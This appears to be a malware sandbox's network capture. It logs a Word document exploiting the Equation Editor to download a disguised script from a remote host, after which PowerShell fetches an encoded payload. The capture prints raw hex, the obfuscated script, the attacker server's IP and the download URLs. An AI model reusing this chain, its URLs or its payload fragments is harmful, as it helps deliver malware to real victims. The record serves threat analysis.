                                                                      Aug 28, 2024 06:53:50.956263065 CEST1236INData Raw: 2f 2f 39 5f 3f 3b 36 3b 60 21 3f 2c 3f 2d 2f 5d 3a 38 5d 2a 40 2a 39 3c 25 34 37 39 2e 32 3c b0 30 25 3e b5 31 39 36 5d 2e 33 3d 25 2c 3a 7c 3a 39 34 31 b5 2a 25 2c 3d 27 60 3d 5e 7e 21 5f 26 3c 39 60 3f 35 35 21 30 2b b0 5e a7 3f 3f 2b 35 25 30
                                                                      Data Ascii: //9_?;6;`!?,?-/]:8]*@*9<%479.2<0%>196].3=%,:|:941*%,='`=^~!_&<9`?55!0+^??+5%0[+7-?)9_![?`056=7?0`1/5']/>$4??!&>])%6_~0?]?#$1?%8.!:&!9|+|%!!0'3%@!`5|74@2?~66`?3**!=3'18<!?)?<5<0>9?~2=4`:?1.*53;#??!1;-:6~@$);=:?/&4?|5<%:??-_^?9@?7?%
                                                                      Aug 28, 2024 06:53:50.956298113 CEST1236INData Raw: 28 b5 2d 2d 5f 7e 33 3f 25 25 5f 28 40 2c 5e 3f 60 7c 5b 3d 3f 30 3d 5b 31 5b 3c 21 3f 35 2b 37 38 3b 30 32 27 25 35 3c 2b 60 3e 2d 7c 31 3f 2c 2b 3b 3f 3f 3c 3a 38 25 31 34 2d 29 25 5e 5f 29 27 31 36 5f 7e 40 b0 3f 2e 25 2d 2d 32 25 3f 7e 23 7e
                                                                      Data Ascii: (--_~3?%%_(@,^?`|[=?0=[1[<!?5+78;02'%5<+`>-|1?,+;??<:8%14-)%^_)'16_~@?.%--2%?~#~!<0`>???.`(56?>47<2]=/&>*0?1+`;0!:%?;?-=<'0^+|8'1:?);!-]+0#^~828;?`3.8?/80&+/4=04(>^@6&/?0`]91[$8(55^(:>'*;/3&]?7<|1-;+93.:'|5..]/0%2,;?3?=%<6`9?0<&`$
                                                                      Aug 28, 2024 06:53:50.956343889 CEST1236INData Raw: 2a 30 38 5d 40 3e 23 5d 3f 39 2d 3e a7 25 34 31 25 25 2b 2c b0 25 30 29 37 3f 5d 2b 27 32 39 34 3f 32 3f 38 32 3a 27 3e 38 21 5f 36 31 3f 2a 25 5b 5e 26 5b 39 25 2a 7e 28 30 2a 29 24 24 3f 24 2f 3b 3f 3a 33 3a 60 28 33 29 5f 5b 28 34 27 b5 3d 3a
                                                                      Data Ascii: *08]@>#]?9->%41%%+,%0)7?]+'294?2?82:'>8!_61?*%[^&[9%*~(0*)$$?$/;?:3:`(3)_[(4'=:%?'&??/%<;!9#:3?>>:#:7]!?7<.,:$:(//#&?:?0?-~?&;<10?%]3-?<~-~%&+1$=5?+!^4$0@0:7?*6>7(;7:$*<]]:.64)+2;5=|/-[?%''(?^9-.398271*0?::%%#4,?,),|#[)/408:#`95#
                                                                      Aug 28, 2024 06:53:50.956377983 CEST776INData Raw: 20 09 20 09 20 09 09 20 63 0d 0a 0a 0d 0d 0d 0d 0d 0d 0d 0a 0d 0a 0d 0d 0a 0a 0a 0a 0a 0a 36 20 09 20 20 20 09 20 09 20 20 09 20 09 09 09 20 09 20 09 09 20 20 09 09 09 09 20 20 09 09 20 09 20 20 09 20 09 09 09 09 09 09 20 09 20 09 20 09 20 20 09
                                                                      Data Ascii: c6 1 e0200
                                                                      Aug 28, 2024 06:53:50.956413031 CEST1236INData Raw: 0d 0a 0a 30 20 20 20 20 09 20 20 09 20 20 09 09 09 09 09 09 09 20 20 09 09 20 20 09 09 20 20 20 20 20 09 20 20 09 20 20 20 09 20 09 09 09 09 09 20 09 20 20 09 09 20 09 20 09 09 20 20 20 09 09 20 20 20 09 20 09 20 09 09 20 30 30 30 20 09 20 09 20
                                                                      Data Ascii: 0 000 0 0000
                                                                      Aug 28, 2024 06:53:50.961664915 CEST1236INData Raw: 09 09 09 09 20 20 09 09 09 09 09 20 09 09 09 20 62 64 34 20 20 20 20 20 20 09 09 09 20 20 20 09 20 20 09 09 20 20 09 20 20 09 09 20 20 20 09 09 20 20 20 20 20 20 20 20 20 20 09 09 20 20 20 09 20 20 20 09 20 20 20 09 20 09 09 09 09 20 20 09 09 09
                                                                      Data Ascii: bd4 702 8 b4d


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.2249169107.172.31.21803672C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 28, 2024 06:54:02.395867109 CEST290OUTHEAD /xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc HTTP/1.1
                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                      Host: 107.172.31.21
                                                                      Content-Length: 0
                                                                      Connection: Keep-Alive
                                                                      Aug 28, 2024 06:54:02.971862078 CEST322INHTTP/1.1 200 OK
                                                                      Date: Wed, 28 Aug 2024 04:54:02 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      Last-Modified: Tue, 27 Aug 2024 14:45:54 GMT
                                                                      ETag: "14696-620ab4c79b162"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 83606
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/msword


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.2249170107.172.31.21803972C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 28, 2024 06:54:03.556162119 CEST347OUTGET /xampp/nbc/sweetbuttersmoothbananahereforyou.tIF HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: 107.172.31.21
                                                                      Connection: Keep-Alive
                                                                      Aug 28, 2024 06:54:05.164135933 CEST1236INHTTP/1.1 200 OK
                                                                      Date: Wed, 28 Aug 2024 04:54:04 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      Last-Modified: Tue, 27 Aug 2024 14:35:42 GMT
                                                                      ETag: "2ccb2-620ab27fcc14f"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 183474
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: image/tiff
                                                                      Data Raw: ff fe 0d 00 0a 00 64 00 4c 00 49 00 63 00 69 00 63 00 4a 00 66 00 68 00 47 00 20 00 3d 00 20 00 22 00 71 00 7a 00 4c 00 57 00 47 00 47 00 57 00 53 00 4c 00 4c 00 22 00 0d 00 0a 00 63 00 6d 00 70 00 4c 00 4c 00 41 00 66 00 50 00 47 00 73 00 20 00 3d 00 20 00 22 00 70 00 43 00 65 00 4c 00 54 00 4a 00 47 00 52 00 6e 00 42 00 22 00 0d 00 0a 00 6e 00 6c 00 66 00 4b 00 68 00 6b 00 54 00 57 00 4b 00 54 00 20 00 3d 00 20 00 22 00 7a 00 43 00 4c 00 6d 00 50 00 4a 00 41 00 6f 00 6d 00 78 00 22 00 0d 00 0a 00 41 00 4e 00 43 00 6a 00 47 00 71 00 6a 00 69 00 57 00 57 00 20 00 3d 00 20 00 22 00 68 00 78 00 57 00 63 00 57 00 6d 00 4b 00 6b 00 6d 00 7a 00 22 00 0d 00 0a 00 4c 00 57 00 55 00 4c 00 57 00 4e 00 69 00 61 00 41 00 6c 00 20 00 3d 00 20 00 22 00 4b 00 7a 00 69 00 55 00 4c 00 69 00 67 00 72 00 6b 00 7a 00 22 00 0d 00 0a 00 6b 00 41 00 65 00 6b 00 47 00 6d 00 62 00 6b 00 42 00 66 00 20 00 3d 00 20 00 22 00 41 00 4c 00 5a 00 7a 00 6e 00 41 00 57 00 4f 00 42 00 64 00 22 00 0d 00 0a 00 62 00 68 00 64 00 66 00 [TRUNCATED]
                                                                      Data Ascii: dLIcicJfhG = "qzLWGGWSLL"cmpLLAfPGs = "pCeLTJGRnB"nlfKhkTWKT = "zCLmPJAomx"ANCjGqjiWW = "hxWcWmKkmz"LWULWNiaAl = "KziULigrkz"kAekGmbkBf = "ALZznAWOBd"bhdfAHmgpL = "UuuKWziioC"BCHLNPtzZL = "edKNAziKAC"UzZGLGpoUf = "lqbmelsqaG"AcNfqokjbd = "WoUUWKIWKK"kzLvikuWGj = "iLicCuKZTQ"GmJeNWqAaU = "CzGLfocGWL"KmLesNozUv = "WheNsqUZic"SmNzkqLvHG = "TpmjkAgWUL"NmmzARlKia = "NZPeRHcdlc"gLmnKGKsNK = "ahqOnAnauq"irOlLNzWeP = "sGbioLLtWz
                                                                      Aug 28, 2024 06:54:05.164148092 CEST1236INData Raw: 00 22 00 0d 00 0a 00 0d 00 0a 00 4c 00 55 00 51 00 4b 00 6b 00 54 00 4b 00 55 00 4c 00 6f 00 20 00 3d 00 20 00 22 00 6f 00 5a 00 4c 00 6e 00 69 00 55 00 51 00 4c 00 4f 00 48 00 22 00 0d 00 0a 00 42 00 63 00 63 00 57 00 64 00 6e 00 65 00 4b 00 53
                                                                      Data Ascii: "LUQKkTKULo = "oZLniUQLOH"BccWdneKSP = "OzWWbNAoLc"CeclzubKRe = "NnfctRKLcR"WupLhlcAGJ = "PIGLznKjLf"hbfeQkWZ
                                                                      Aug 28, 2024 06:54:05.164161921 CEST1236INData Raw: 00 55 00 4c 00 54 00 20 00 3d 00 20 00 22 00 48 00 69 00 7a 00 65 00 52 00 55 00 69 00 48 00 65 00 68 00 22 00 0d 00 0a 00 5a 00 4e 00 63 00 4c 00 64 00 57 00 71 00 47 00 68 00 54 00 20 00 3d 00 20 00 22 00 61 00 6b 00 69 00 47 00 57 00 57 00 64
                                                                      Data Ascii: ULT = "HizeRUiHeh"ZNcLdWqGhT = "akiGWWdkCZ"OoczLauZtn = "GLHAdnpCbU"GLlKkUUfmx = "iNcBibZQSK"oUitKBNPkp = "cLqLfi
                                                                      Aug 28, 2024 06:54:05.164172888 CEST1236INData Raw: 00 3d 00 20 00 22 00 62 00 4a 00 49 00 75 00 4c 00 7a 00 69 00 65 00 4f 00 50 00 22 00 0d 00 0a 00 65 00 6e 00 63 00 71 00 4c 00 75 00 6b 00 52 00 6f 00 78 00 20 00 3d 00 20 00 22 00 42 00 6d 00 4b 00 76 00 64 00 57 00 6d 00 66 00 52 00 7a 00 22
                                                                      Data Ascii: = "bJIuLzieOP"encqLukRox = "BmKvdWmfRz"qlUaAWGigW = "aLeBCWiUWW"LiPKKGWLCL = "sUpPehiLkH"bUOLqiLzBH = "LmWLocBZvs
                                                                      Aug 28, 2024 06:54:05.164181948 CEST896INData Raw: 00 6f 00 22 00 0d 00 0a 00 5a 00 6f 00 66 00 6e 00 65 00 4e 00 55 00 6d 00 6c 00 5a 00 20 00 3d 00 20 00 22 00 57 00 6f 00 55 00 6a 00 57 00 6b 00 47 00 69 00 54 00 69 00 22 00 0d 00 0a 00 57 00 6c 00 73 00 64 00 7a 00 57 00 70 00 4c 00 50 00 65
                                                                      Data Ascii: o"ZofneNUmlZ = "WoUjWkGiTi"WlsdzWpLPe = "ZUUvJCLLlL"CcKWhhcPbW = "imumKKsnLZ"tAWCLULGGW = "kUuuLLWduR"USWHpkG
                                                                      Aug 28, 2024 06:54:05.164192915 CEST1236INData Raw: 00 47 00 53 00 20 00 3d 00 20 00 22 00 74 00 62 00 62 00 4c 00 4c 00 50 00 4e 00 4a 00 53 00 75 00 22 00 0d 00 0a 00 7a 00 50 00 75 00 67 00 6d 00 6a 00 4e 00 50 00 42 00 57 00 20 00 3d 00 20 00 22 00 74 00 5a 00 74 00 5a 00 4e 00 5a 00 63 00 78
                                                                      Data Ascii: GS = "tbbLLPNJSu"zPugmjNPBW = "tZtZNZcxBo"fAqkLRaNWq = "cKnLCmOqok"sbzkmaAAWf = "PdWKGzWbWA"dphLLWjciN = "mipJNoi
                                                                      Aug 28, 2024 06:54:05.164202929 CEST1236INData Raw: 00 67 00 4c 00 4c 00 4b 00 4b 00 42 00 70 00 20 00 3d 00 20 00 22 00 57 00 55 00 6f 00 4c 00 70 00 57 00 65 00 47 00 61 00 74 00 22 00 0d 00 0a 00 4c 00 61 00 6b 00 6e 00 43 00 42 00 65 00 5a 00 4c 00 54 00 20 00 3d 00 20 00 22 00 4c 00 50 00 53
                                                                      Data Ascii: gLLKKBp = "WUoLpWeGat"LaknCBeZLT = "LPSNuGWrSh"PPiccURAUK = "GcfsqgLogK"KLOWGWGdRZ = "LOGccWLUCi"dceqKZxZWL = "
                                                                      Aug 28, 2024 06:54:05.164230108 CEST1236INData Raw: 00 68 00 4e 00 55 00 20 00 3d 00 20 00 22 00 69 00 6b 00 75 00 41 00 4c 00 63 00 52 00 57 00 4c 00 62 00 22 00 0d 00 0a 00 63 00 4b 00 49 00 72 00 4c 00 4c 00 6f 00 47 00 4b 00 7a 00 20 00 3d 00 20 00 22 00 69 00 43 00 47 00 4c 00 6c 00 55 00 68
                                                                      Data Ascii: hNU = "ikuALcRWLb"cKIrLLoGKz = "iCGLlUhNZi"WUoGZqGKzW = "tLcPcleZhL"cKmLKjikuU = "uhObUtiIkC"IgzOUipmhn = "tkht
                                                                      Aug 28, 2024 06:54:05.164242029 CEST1236INData Raw: 00 64 00 52 00 41 00 70 00 65 00 78 00 4f 00 22 00 0d 00 0a 00 57 00 6f 00 50 00 6e 00 4c 00 68 00 51 00 78 00 57 00 63 00 20 00 3d 00 20 00 22 00 4c 00 57 00 47 00 4f 00 4b 00 75 00 4c 00 74 00 69 00 68 00 22 00 0d 00 0a 00 57 00 61 00 69 00 6b
                                                                      Data Ascii: dRApexO"WoPnLhQxWc = "LWGOKuLtih"WaikoWbzWL = "WHRZoGKzKK"ozZAvAhcpU = "fOlIkGxLWK"SxGccHbUWK = "BKxlUWLLNK"zit
                                                                      Aug 28, 2024 06:54:05.164253950 CEST1236INData Raw: 00 4c 00 4e 00 6c 00 4c 00 62 00 63 00 4b 00 5a 00 20 00 3d 00 20 00 22 00 64 00 4c 00 4c 00 69 00 6d 00 4c 00 47 00 6b 00 57 00 69 00 22 00 0d 00 0a 00 4e 00 47 00 55 00 4b 00 41 00 55 00 4e 00 55 00 6d 00 57 00 20 00 3d 00 20 00 22 00 75 00 51
                                                                      Data Ascii: LNlLbcKZ = "dLLimLGkWi"NGUKAUNUmW = "uQUknWicim"lmWLbkZLdW = "oPicOKWbBf"iPxGoveCGk = "eGikGNULGf"hkuARkPiLa = "L
                                                                      Aug 28, 2024 06:54:05.164622068 CEST1236INData Raw: 00 69 00 53 00 68 00 63 00 43 00 4b 00 47 00 5a 00 4b 00 43 00 22 00 0d 00 0a 00 57 00 70 00 76 00 78 00 52 00 6f 00 62 00 78 00 7a 00 57 00 20 00 3d 00 20 00 22 00 70 00 61 00 50 00 43 00 64 00 4c 00 6b 00 5a 00 63 00 71 00 22 00 0d 00 0a 00 4c
                                                                      Data Ascii: iShcCKGZKC"WpvxRobxzW = "paPCdLkZcq"LhtnKfalgA = "KLobtqCOZL"ecWpvoLxWI = "RKzUAWompN"iZmQLbLfRW = "iiIsCdPiTn"
                                                                      Aug 28, 2024 06:54:05.170893908 CEST1236INHTTP/1.1 200 OK
                                                                      Date: Wed, 28 Aug 2024 04:54:04 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      Last-Modified: Tue, 27 Aug 2024 14:35:42 GMT
                                                                      ETag: "2ccb2-620ab27fcc14f"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 183474
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: image/tiff
                                                                      Data Raw: ff fe 0d 00 0a 00 64 00 4c 00 49 00 63 00 69 00 63 00 4a 00 66 00 68 00 47 00 20 00 3d 00 20 00 22 00 71 00 7a 00 4c 00 57 00 47 00 47 00 57 00 53 00 4c 00 4c 00 22 00 0d 00 0a 00 63 00 6d 00 70 00 4c 00 4c 00 41 00 66 00 50 00 47 00 73 00 20 00 3d 00 20 00 22 00 70 00 43 00 65 00 4c 00 54 00 4a 00 47 00 52 00 6e 00 42 00 22 00 0d 00 0a 00 6e 00 6c 00 66 00 4b 00 68 00 6b 00 54 00 57 00 4b 00 54 00 20 00 3d 00 20 00 22 00 7a 00 43 00 4c 00 6d 00 50 00 4a 00 41 00 6f 00 6d 00 78 00 22 00 0d 00 0a 00 41 00 4e 00 43 00 6a 00 47 00 71 00 6a 00 69 00 57 00 57 00 20 00 3d 00 20 00 22 00 68 00 78 00 57 00 63 00 57 00 6d 00 4b 00 6b 00 6d 00 7a 00 22 00 0d 00 0a 00 4c 00 57 00 55 00 4c 00 57 00 4e 00 69 00 61 00 41 00 6c 00 20 00 3d 00 20 00 22 00 4b 00 7a 00 69 00 55 00 4c 00 69 00 67 00 72 00 6b 00 7a 00 22 00 0d 00 0a 00 6b 00 41 00 65 00 6b 00 47 00 6d 00 62 00 6b 00 42 00 66 00 20 00 3d 00 20 00 22 00 41 00 4c 00 5a 00 7a 00 6e 00 41 00 57 00 4f 00 42 00 64 00 22 00 0d 00 0a 00 62 00 68 00 64 00 66 00 [TRUNCATED]
                                                                      Data Ascii: dLIcicJfhG = "qzLWGGWSLL"cmpLLAfPGs = "pCeLTJGRnB"nlfKhkTWKT = "zCLmPJAomx"ANCjGqjiWW = "hxWcWmKkmz"LWULWNiaAl = "KziULigrkz"kAekGmbkBf = "ALZznAWOBd"bhdfAHmgpL = "UuuKWziioC"BCHLNPtzZL = "edKNAziKAC"UzZGLGpoUf = "lqbmelsqaG"AcNfqokjbd = "WoUUWKIWKK"kzLvikuWGj = "iLicCuKZTQ"GmJeNWqAaU = "CzGLfocGWL"KmLesNozUv = "WheNsqUZic"SmNzkqLvHG = "TpmjkAgWUL"NmmzARlKia = "NZPeRHcdlc"gLmnKGKsNK = "ahqOnAnauq"irOlLNzWeP = "sGbioLLtWz
                                                                      Aug 28, 2024 06:54:05.170916080 CEST1236INHTTP/1.1 200 OK
                                                                      Date: Wed, 28 Aug 2024 04:54:04 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      Last-Modified: Tue, 27 Aug 2024 14:35:42 GMT
                                                                      ETag: "2ccb2-620ab27fcc14f"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 183474
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: image/tiff
                                                                      Data Raw: ff fe 0d 00 0a 00 64 00 4c 00 49 00 63 00 69 00 63 00 4a 00 66 00 68 00 47 00 20 00 3d 00 20 00 22 00 71 00 7a 00 4c 00 57 00 47 00 47 00 57 00 53 00 4c 00 4c 00 22 00 0d 00 0a 00 63 00 6d 00 70 00 4c 00 4c 00 41 00 66 00 50 00 47 00 73 00 20 00 3d 00 20 00 22 00 70 00 43 00 65 00 4c 00 54 00 4a 00 47 00 52 00 6e 00 42 00 22 00 0d 00 0a 00 6e 00 6c 00 66 00 4b 00 68 00 6b 00 54 00 57 00 4b 00 54 00 20 00 3d 00 20 00 22 00 7a 00 43 00 4c 00 6d 00 50 00 4a 00 41 00 6f 00 6d 00 78 00 22 00 0d 00 0a 00 41 00 4e 00 43 00 6a 00 47 00 71 00 6a 00 69 00 57 00 57 00 20 00 3d 00 20 00 22 00 68 00 78 00 57 00 63 00 57 00 6d 00 4b 00 6b 00 6d 00 7a 00 22 00 0d 00 0a 00 4c 00 57 00 55 00 4c 00 57 00 4e 00 69 00 61 00 41 00 6c 00 20 00 3d 00 20 00 22 00 4b 00 7a 00 69 00 55 00 4c 00 69 00 67 00 72 00 6b 00 7a 00 22 00 0d 00 0a 00 6b 00 41 00 65 00 6b 00 47 00 6d 00 62 00 6b 00 42 00 66 00 20 00 3d 00 20 00 22 00 41 00 4c 00 5a 00 7a 00 6e 00 41 00 57 00 4f 00 42 00 64 00 22 00 0d 00 0a 00 62 00 68 00 64 00 66 00 [TRUNCATED]
                                                                      Data Ascii: dLIcicJfhG = "qzLWGGWSLL"cmpLLAfPGs = "pCeLTJGRnB"nlfKhkTWKT = "zCLmPJAomx"ANCjGqjiWW = "hxWcWmKkmz"LWULWNiaAl = "KziULigrkz"kAekGmbkBf = "ALZznAWOBd"bhdfAHmgpL = "UuuKWziioC"BCHLNPtzZL = "edKNAziKAC"UzZGLGpoUf = "lqbmelsqaG"AcNfqokjbd = "WoUUWKIWKK"kzLvikuWGj = "iLicCuKZTQ"GmJeNWqAaU = "CzGLfocGWL"KmLesNozUv = "WheNsqUZic"SmNzkqLvHG = "TpmjkAgWUL"NmmzARlKia = "NZPeRHcdlc"gLmnKGKsNK = "ahqOnAnauq"irOlLNzWeP = "sGbioLLtWz


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.2249172107.172.31.21802772C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 28, 2024 06:54:12.403237104 CEST81OUTGET /xampp/nbc/EVRR.txt HTTP/1.1
                                                                      Host: 107.172.31.21
                                                                      Connection: Keep-Alive
                                                                      Aug 28, 2024 06:54:13.525708914 CEST1236INHTTP/1.1 200 OK
                                                                      Date: Wed, 28 Aug 2024 04:54:12 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      Last-Modified: Tue, 27 Aug 2024 14:33:15 GMT
                                                                      ETag: "a1000-620ab1f342ee9"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 659456
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/plain
                                                                      Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
                                                                      Aug 28, 2024 06:54:13.525742054 CEST1236INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                                                                      Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
                                                                      Aug 28, 2024 06:54:13.525755882 CEST1236INData Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44
                                                                      Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
                                                                      Aug 28, 2024 06:54:13.525888920 CEST1236INData Raw: 77 77 4f 49 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4e 30 67 43
                                                                      Data Ascii: wwOIAAAAAOAFAOAAAANUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDU0wENIRDR0AEN8QDN0gCNkQDI0wBNYQDF0ABNMQDB0AwM8PD+zQ/MwPD7zg+MgPD2AAAAcBQBQDgOsrD66QuOgrD36gtOUrD06wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlO
                                                                      Aug 28, 2024 06:54:13.525899887 CEST1236INData Raw: 79 44 6a 38 51 49 50 38 78 44 64 38 77 47 50 6b 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44
                                                                      Data Ascii: yDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv
                                                                      Aug 28, 2024 06:54:13.525909901 CEST1120INData Raw: 41 33 50 6d 39 44 58 2f 49 31 50 49 39 6a 50 2f 49 7a 50 6e 38 54 48 2f 4d 78 50 4a 34 7a 2f 2b 51 75 50 4a 37 6a 70 2b 4d 6f 50 6f 35 6a 58 2b 51 6c 50 4b 35 44 51 2b 59 6a 50 73 34 6a 49 2b 67 68 50 4f 34 44 42 39 6f 66 50 77 33 6a 35 39 77 64
